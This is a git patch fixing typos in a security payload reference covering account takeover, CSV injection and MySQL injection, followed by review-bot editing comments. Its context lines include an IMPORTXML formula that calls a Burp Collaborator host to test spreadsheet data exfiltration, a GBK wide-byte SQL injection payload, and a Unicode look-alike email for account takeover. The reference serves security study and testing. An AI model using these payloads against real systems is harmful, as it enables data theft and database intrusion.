From 01a6299b08eb5971c20f49e2325310c77715129a Mon Sep 17 00:00:00 2001 From: clemensGooooo <100614200+clemensGooooo@users.noreply.github.com> Date: Tue, 29 Jul 2025 15:34:52 +0200 Subject: [PATCH] Fix several typos --- Account Takeover/README.md | 6 +++--- CSV Injection/README.md | 4 ++-- Insecure Randomness/README.md | 2 +- SQL Injection/MySQL Injection.md | 4 ++-- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 14d26e3b..0aa42204 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -13,7 +13,7 @@ * [Leaking Password Reset Token](#leaking-password-reset-token) * [Password Reset via Username Collision](#password-reset-via-username-collision) * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue) -* [Account Takeover via Web Vulneralities](#account-takeover-via-web-vulneralities) +* [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities) * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via CSRF](#account-takeover-via-csrf) @@ -110,7 +110,7 @@ See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) ### Account Takeover Due To Unicode Normalization Issue -When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur. +When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur. * Victim account: `demo@gmail.com` * Attacker account: `demⓞ@gmail.com` 
@@ -119,7 +119,7 @@ When processing user input involving unicode for case mapping or normalisation, [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform. -## Account Takeover via Web Vulneralities +## Account Takeover via Web Vulnerabilities ### Account Takeover via Cross Site Scripting diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 3c65ca6a..047cb2d0 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -65,7 +65,7 @@ Technical details of the above payloads: ### Google Sheets -Google Sheets allows some additionnal formulas that are able to fetch remote URLs: +Google Sheets allows some additional formulas that are able to fetch remote URLs: * [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale) * [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string) @@ -79,7 +79,7 @@ So one can test blind formula injection or a potential for data exfiltration wit =IMPORTXML("http://burp.collaborator.net/csv", "//a/@href") ``` -Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization. +Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization. ## References diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md index be9a00ed..1f9916ef 100644 --- a/Insecure Randomness/README.md +++ b/Insecure Randomness/README.md @@ -188,7 +188,7 @@ Creating your own randomness algorithm is generally not recommended. Below are s ### Tools -Generic identification and sandwitch attack: +Generic identification and sandwich attack: * [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources 
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index d9d43b79..52f96360 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -718,7 +718,7 @@ Wide byte injection is a specific type of SQL injection attack that targets appl The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code. -Several characters can be used to triger the injection. +Several characters can be used to trigger the injection. * `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string. * `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence. 
@@ -756,7 +756,7 @@ For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in t However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`. -In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection. +In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape character, allowing for SQL injection. Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.
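Review bot: Links that point at the old fragment `#account-takeover-via-web-vulneralities` from outside `Account Takeover/README.md` will stop resolving once the heading in the `@@ -119` hunk is renamed. The table-of-contents entry in the `@@ -13` hunk is updated to match, which covers the in-file link. Please search the rest of the repository for the old fragment and update any hits in this same patch.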
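Review bot: The corrected sentence in the `@@ -110` hunk of `Account Takeover/README.md` still mixes spellings, with `normalisation` next to `behavior` and a lowercase `unicode` under a heading that reads `Unicode Normalization Issue`. Since the line is being touched anyway, suggest `involving Unicode for case mapping or normalization` so it matches the heading directly above it.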
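Review bot: In the `Insecure Randomness/README.md` hunk, the fixed line writes `sandwich attack` in lowercase while the bullet right below it writes `Sandwich attack`. Pick one capitalization for the term and use it on both lines.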
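Review bot: The `%bf%27` bullet kept as context in the `@@ -718` hunk of `SQL Injection/MySQL Injection.md` is hard to follow as worded: it describes the two-byte sequence `0xbf27` as decoding to a multibyte character followed by a single quote. The `%df` walkthrough in the `@@ -756` hunk shows the step that is missing here, namely that the escaping layer inserts a backslash and the lead byte then pairs with that backslash. Not a blocker for a typo fix, but a follow-up that rewords this bullet to mention the inserted backslash would make the two passages agree.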
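Review bot: The sentence fixed in the `@@ -756` hunk is still ungrammatical after the `charactr` correction, because `the wide byte character ... effectively "eating" the added escape character` has no finite verb. Suggest `effectively "eats" the added escape character, allowing for SQL injection` in the same change.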